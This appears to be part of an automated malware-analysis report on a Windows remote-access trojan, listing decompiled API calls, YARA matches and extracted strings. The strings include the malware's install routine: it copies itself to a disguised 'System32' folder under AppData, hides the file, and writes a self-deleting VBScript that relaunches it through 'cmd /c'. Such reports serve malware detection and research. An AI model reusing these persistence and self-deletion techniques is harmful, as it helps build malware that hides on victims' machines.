                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                        • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                        • atoi.MSVCRT ref: 0040D285
                                        • Sleep.KERNELBASE(00000000), ref: 0040D293
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                        • String ID: %I64u$2.7.2 Pro$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                        • API String ID: 43808216-1497891699
                                        • Opcode ID: fd078036bc6e3efe90bf92ac6dee8b503a109bc941e2af166bf713293f252958
                                        • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                        • Opcode Fuzzy Hash: fd078036bc6e3efe90bf92ac6dee8b503a109bc941e2af166bf713293f252958
                                        • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407E37, Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 326fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 00407E46
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                        • wcscmp.MSVCRT ref: 00407EE0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000000), ref: 00407F25
                                        • wcslen.MSVCRT ref: 00407F40
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,00000000), ref: 00407FC6
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407FD3
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                        • wcslen.MSVCRT ref: 00408022
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                        • _wgetenv.MSVCRT ref: 0040804B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?,00415628,0041623C), ref: 004080B0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                        • exit.MSVCRT ref: 00408228
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                        • String ID: """, 0$6$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 740851534-527989207
                                        • Opcode ID: 24be007b77389102dc2112617a33238c259527d6b97af79cdcea8e1b19f5812d
                                        • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
